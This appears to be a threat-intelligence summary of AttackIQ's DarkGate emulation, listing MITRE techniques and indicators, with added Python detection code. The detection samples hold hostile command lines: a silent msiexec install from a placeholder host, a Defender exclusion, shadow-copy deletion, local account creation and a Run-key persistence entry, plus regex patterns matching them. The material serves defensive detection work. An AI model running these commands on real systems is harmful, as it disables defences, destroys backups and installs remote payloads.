Keypoints
- AttackIQ released three attack graphs that model DarkGate campaigns from 2023 to validate security controls.
- Delivery methods reproduced include Microsoft Teams/Skype phishing, SEO poisoning, drive-by downloads, and fake invoice emails.
- Typical loader chain: ZIP/LNK → VBS → AutoIt script hosting a Delphi loader or CAB → Internet shortcut → MSI executed via msiexec.
- Defense-evasion techniques emulated: adding Defender exclusions, process hollowing, DLL side‑loading, and parent PID spoofing.
- Persistence and configuration changes: registry Run/RunOnce keys, Startup folder shortcuts, and Terminal Services registry modifications.
- Discovery and exfiltration steps: registry and API queries, systeminfo, tasklist, ipconfig/route, WMIC AV enumeration, WebCache extraction, and HTTP POST exfiltration.
- Lateral movement and cleanup: RDP-based lateral movement, creation of local accounts, and deletion of Volume Shadow Copies via vssadmin.
MITRE Techniques
- [T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery controls (‘This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious files.’)
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Executes scripts via cscript.exe (‘This scenario will validate if it is possible to execute a JavaScript file via cscript.exe.’)
- [T1562.001] Impair Defenses: Disable or Modify Tools – Adds Defender exclusions using Add-MpPreference (‘This scenario will execute the Add-MpPreference PowerShell cmdlet to add the %TEMP%\aiq-temp-exclusion directory path to the exclusion list in Microsoft Defender.’)
- [T1055.012] Process Injection: Process Hollowing – Replaces a suspended process's memory with a malicious executable to mask code execution (‘This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable.’)
- [T1547.001] Logon Autostart Execution: Registry Run Keys / Startup Folder – Establishes persistence via Run/RunOnce keys and Startup folder LNKs (‘This scenario sets the HKLM\Software\Microsoft\Windows\CurrentVersion\Run and RunOnce registry keys…’ and ‘This scenario creates a LNK file in this directory that would execute at the next Logon for all users.’)
- [T1112] Modify Registry – Changes Terminal Services registry values to alter RDP settings (‘The HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services\DisableRemoteDesktopAntiAlias registry value is modified…’)
- [T1012] Query Registry – Reads registry keys for hardware and user information (‘The HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor registry key is queried to collect information related to the system’s processor.’)
- [T1082] System Information Discovery – Uses systeminfo and GetComputerNameA to gather system details (‘The native systeminfo command is executed to discover the basic details about the compromised system.’ and ‘GetComputerNameA Windows API to retrieve a NetBIOS name’)
- [T1614] System Location Discovery – Calls Windows APIs to retrieve locale/location (‘GetUserDefaultLocaleName and GetUserDefaultLCID Windows APIs to retrieve the location of the compromised system.’)
- [T1120] Peripheral Device Discovery – Uses GetDriveTypeA to identify drive types (‘This scenario executes the GetDriveTypeA Windows API to discover the drive type of the compromised system.’)
- [T1083] File and Directory Discovery – Uses dir to enumerate files and output results to temp files (‘This scenario uses the native dir command to find files of interest and output to a temporary file.’)
- [T1518.001] Security Software Discovery – Uses WMIC to enumerate AntiVirusProduct classes (‘A native Microsoft Windows WMIC is executed to determine which software has been installed as an AntiVirusProduct class.’)
- [T1016] System Network Configuration Discovery – Runs route, ipconfig, and net use to collect network details (‘Native Windows commands such as route, ipconfig, and net use are executed to collect details about the infected host and network shares.’)
- [T1057] Process Discovery – Uses tasklist to enumerate running processes (‘This scenario executes the Windows built-in tasklist command to discover running processes on the compromised system.’)
- [T1217] Browser Bookmark Discovery – Extracts WebCache database copies via esentutl to harvest browser data (‘a PowerShell script … attempt to flush the data from the WebCache log files back to the WebCacheV01 database … a copy of the database will be made to a temporary directory.’)
- [T1041] Exfiltration Over C2 Channel – Sends files to attacker server via HTTP POST (‘Files are sent to an AttackIQ controlled server using HTTP POST requests.’)
- [T1021.001] Remote Services: Remote Desktop Protocol – Attempts RDP-based lateral movement to other hosts (‘This scenario attempts to use Remote Desktop to move laterally to additional hosts available on the compromised network.’)
- [T1136.001] Create Account: Local Account – Creates local accounts for persistence using net user (‘This scenario will create a new local account using net user to ensure persistence on the newly compromised systems.’)
- [T1490] Inhibit System Recovery – Deletes Volume Shadow Copies using vssadmin.exe (‘This scenario executes the vssadmin.exe utility to delete a recently created Volume Shadow Copy.’)
- [T1218.007] System Binary Proxy Execution: Msiexec – Executes MSI payloads via msiexec.exe (‘This scenario executes a Windows Installer Package (MSI) using the msiexec.exe utility.’)
- [T1055] Process Injection (general) – Injects DLLs into running processes (‘This scenario injects a DLL file into another running process and validates if a canary file can be created.’)
- [T1134.004] Access Token Manipulation: Parent PID Spoofing – Creates processes that appear spawned by legitimate processes using CreateProcess (‘This scenario calls the CreateProcess Windows API which allows it to specify which parent process should be responsible for this new process.’)
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Drops dbgeng.dll and uses side-loading to execute decoded AutoIT script (‘This DLL…is executed using the DLL Side-Loading technique, carries out the task of decoding a piece of information which turns out to be an AutoIT script.’)
- [T1546.001] Boot or Logon Autostart Execution (Registry/Startup) – Highlighted as a prioritised detection/mitigation focus for preventing persistence (‘Preventing an actor from maintaining a foothold in your environment should always be one of the top priorities. During these activities, the adversary used registry keys to achieve persistence.’)
Indicators of Compromise
- [File names] Loader and runtime artifacts – dbgeng.dll, msiexec.exe (used to execute MSI), and vssadmin.exe (used to delete shadows).
- [File types] Delivery artifacts and scripts – .zip containing .lnk, .vbs, .msi, .cab, and AutoIt (.au3) scripts.
- [Registry keys/values] Persistence and config changes – HKLM\Software\Microsoft\Windows\CurrentVersion\Run, RunOnce, and HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services\DisableRemoteDesktopAntiAlias.
- [Directories/Exclusions] Defender exclusion path – %TEMP%\aiq-temp-exclusion (added via Add-MpPreference to evade detection).
- [Processes/Commands] Execution and discovery commands – cscript.exe, msiexec.exe, tasklist, systeminfo, ipconfig/route, net use, and net user.
- [Data stores] Browser cache extraction target – WebCacheV01 database (copied for bookmark/browser data extraction).
Delivery chains reproduced by AttackIQ begin with social-engineered or browser-triggered downloads: ZIP archives containing LNK shortcuts that drop VBS scripts (opened via cscript.exe), CAB files with Internet shortcuts that retrieve MSI installers, and drive-by fake installers that launch AutoIt scripts. These intermediary artifacts consistently lead to execution of an AutoIt script that hosts a Delphi-based loader, which in turn deploys the final payload (e.g., DarkGate or secondary DanaBot payloads) and may be executed via msiexec or script interpreters.
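The loader chain above (LNK/VBS opened by cscript, then AutoIt, then msiexec) is easiest to catch by correlating process ancestry rather than any single event. The following is an added detection example, not AttackIQ's code; the process-creation events are constructed, the field names are assumptions, and the MSI host is a placeholder.

```python
"""Walk process ancestry and flag lineages that complete the DarkGate loader
chain described on this page. Added example; events are constructed sample
data in the shape of Sysmon Event ID 1, not real telemetry."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed sample events (assumed field layout: pid, parent pid, image, cmdline).
EVENTS = [
    Proc(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(501, 400, r"C:\Windows\System32\cmd.exe",
         r'cmd.exe /c "C:\Users\u\Downloads\invoice.lnk"'),
    Proc(502, 501, r"C:\Windows\System32\cscript.exe",
         r"cscript.exe //E:vbscript C:\Users\u\AppData\Local\Temp\inv.vbs"),
    Proc(503, 502, r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
         r"AutoIt3.exe C:\Users\u\AppData\Local\Temp\script.au3"),
    Proc(504, 503, r"C:\Windows\System32\msiexec.exe",
         "msiexec.exe /i http://[placeholder-host]/update.msi /qn"),
    Proc(600, 400, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Ordered stages of the chain, matched against the image basename. Other
# processes (e.g. cmd.exe launched by the LNK) may sit between stages.
CHAIN = ["cscript.exe", "autoit3.exe", "msiexec.exe"]

def ancestry(events, pid):
    """Return the processes from pid up to the root (leaf first), guarding
    against PID reuse loops in the sample."""
    by_pid = {e.pid: e for e in events}
    path, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        path.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return path

def matches_chain(events, pid, chain=CHAIN):
    """True if the root-to-leaf lineage of pid contains every chain stage in order."""
    names = [p.image.rsplit("\\", 1)[-1].lower()
             for p in reversed(ancestry(events, pid))]
    stage = 0
    for name in names:
        if stage < len(chain) and name == chain[stage]:
            stage += 1
    return stage == len(chain)

def flagged_pids(events, chain=CHAIN):
    """PIDs whose lineage completes the chain; only the final stage fires."""
    return [e.pid for e in events if matches_chain(events, e.pid, chain)]
```

The same walk generalises to any ordered interpreter sequence (e.g. wscript → powershell → rundll32) by changing CHAIN.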
Post‑execution techniques focus on defense evasion, persistence, and masquerading: the scenarios add Defender exclusions (Add‑MpPreference for %TEMP%\aiq-temp-exclusion), perform process hollowing and DLL side‑loading (e.g., dbgeng.dll) to hide execution, and use parent PID spoofing to make malicious processes appear spawned by legitimate binaries. Persistence is achieved through registry Run/RunOnce keys and Startup folder LNKs, and the emulation modifies Terminal Services registry values to change RDP settings.
For reconnaissance, the emulations run registry queries and Windows APIs (GetComputerNameA, GetUserDefaultLocaleName, GetDriveTypeA), use native commands (systeminfo, tasklist, ipconfig, route, dir, WMIC AntiVirusProduct), extract browser WebCache data, and exfiltrate collected files via HTTP POST to C2. Lateral movement uses RDP, and net user creates local accounts on the newly reached hosts; the final clean-up or disruption step runs vssadmin.exe to delete Volume Shadow Copies.
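Most of the evasion, persistence, discovery and cleanup steps in the two paragraphs above surface as distinctive command lines, so a small rule set over process-creation events gives a quick control check. This is an added example, not AttackIQ's scenario code; the sample events are constructed and the technique labels are the MITRE IDs listed on this page.

```python
"""Match the command lines emulated on this page against per-technique rules.
Added example with constructed sample events (pid, command line)."""
import re

# (technique ID from the page, short description, regex over the command line)
RULES = [
    ("T1562.001", "Defender exclusion added via Add-MpPreference",
     re.compile(r"add-mppreference.*-exclusion(path|process|extension)", re.I)),
    ("T1490", "Volume Shadow Copies deleted with vssadmin",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1136.001", "Local account created with net user",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.I)),
    ("T1518.001", "AntiVirusProduct enumerated via WMIC",
     re.compile(r"\bwmic(\.exe)?\b.*antivirusproduct", re.I)),
    ("T1547.001", "Run/RunOnce key written with reg add",
     re.compile(r"\breg(\.exe)?\s+add\s+.*currentversion\\run(once)?\b", re.I)),
    ("T1112", "Terminal Services RDP policy value modified",
     re.compile(r"terminal services\\disableremotedesktopantialias", re.I)),
    ("T1217", "WebCacheV01 database copied with esentutl",
     re.compile(r"\besentutl(\.exe)?\b.*webcachev01", re.I)),
]

def classify(cmdline):
    """Return the technique IDs whose rule matches this command line."""
    return [tid for tid, _, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Map pid -> matched technique IDs; events with no match are dropped."""
    hits = {}
    for pid, cmdline in events:
        ids = classify(cmdline)
        if ids:
            hits[pid] = ids
    return hits

# Constructed sample events; the account name and password are placeholders.
SAMPLE = [
    (1201, r'powershell.exe -c "Add-MpPreference -ExclusionPath %TEMP%\aiq-temp-exclusion"'),
    (1202, "vssadmin.exe delete shadows /for=C: /oldest"),
    (1203, "net user svc_example P@ss_example /add"),
    (1204, "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName"),
    (1205, r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\x\a.exe"),
    (1206, "systeminfo"),  # discovery noise that should not fire a rule on its own
]
```

Benign discovery commands such as systeminfo are deliberately left unmatched; on their own they are too common to alert on, and belong in the ancestry correlation rather than a single-event rule.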
Read more: https://www.attackiq.com/2024/02/14/emulating-darkgate/